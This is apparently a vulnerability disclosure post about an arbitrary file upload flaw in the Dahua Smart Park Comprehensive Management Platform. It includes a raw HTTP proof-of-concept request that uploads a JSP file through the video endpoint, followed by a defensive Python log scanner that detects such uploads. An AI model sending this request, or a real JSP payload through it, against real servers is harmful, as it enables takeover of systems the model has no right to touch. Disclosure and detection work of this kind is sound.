Dahua Smart Park Comprehensive Management Platform video Arbitrary File Upload Vulnerability
Vulnerability Description
The video interface of the Dahua Smart Park Comprehensive Management Platform has an arbitrary file upload vulnerability. An attacker can use it to upload any file to the server and take control of the server.
Vulnerability Impact
Dahua Smart Park Comprehensive Management Platform
Network surveying and mapping
Vulnerability Reproduction
Login page
Verification PoC
POST /publishing/publishing/material/file/video HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"

Test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7--
Uploaded file path:
/publishingImg/VIDEO/230812152005170200.jsp
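
A defender-side check for the behaviour shown above, as an added example that is not part of the original post: it scans web access logs for JSP files requested from the /publishingImg/ media directory and notes whether the same client had previously posted to the video upload endpoint. The "combined" log format, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Endpoint and media directory as they appear in the request and path above.
UPLOAD_PATH = "/publishing/publishing/material/file/video"
MEDIA_PREFIX = "/publishingimg/"
# JSP-family extensions, allowing a ";jsessionid=..." style path parameter.
SCRIPT_EXT = re.compile(r"\.jsp[xf]?(;[^/]*)?$", re.I)
# Assumption: the front end writes Apache/Nginx "combined" access logs.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

def normalise(target):
    """Drop the query string, decode %xx, collapse repeated slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def scan(lines):
    """Return (verdict, ip, timestamp, path) for script requests in the media dir."""
    uploaders, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        path = normalise(m["target"])
        if m["method"] == "POST" and path.rstrip("/") == UPLOAD_PATH:
            uploaders.add(m["ip"])  # the endpoint has legitimate uses; only remember the client
        elif path.startswith(MEDIA_PREFIX) and SCRIPT_EXT.search(path):
            if not m["status"].startswith("2"):
                verdict = "probe"                # script requested but not served
            elif m["ip"] in uploaders:
                verdict = "served-after-upload"  # same client uploaded first
            else:
                verdict = "served"
            findings.append((verdict, m["ip"], m["ts"], path))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real system.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Aug/2023:15:20:05 +0800] "POST /publishing/publishing/material/file/video HTTP/1.1" 200 152 "-" "-"',
    '198.51.100.7 - - [12/Aug/2023:15:20:09 +0800] "GET /publishingImg/VIDEO/230812152005170200.jsp HTTP/1.1" 200 4 "-" "-"',
    '192.0.2.10 - - [12/Aug/2023:15:21:00 +0800] "GET /publishingImg/VIDEO/230812151000000001.mp4 HTTP/1.1" 200 1048576 "-" "-"',
    '203.0.113.5 - - [12/Aug/2023:15:22:00 +0800] "GET /publishingImg//VIDEO/a%2Ejsp?x=1 HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any "served" or "served-after-upload" result means a script file exists in a directory that should only hold media, which warrants checking the file on disk and blocking script execution under that path.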
This post is licensed under CC BY 4.0 by the author.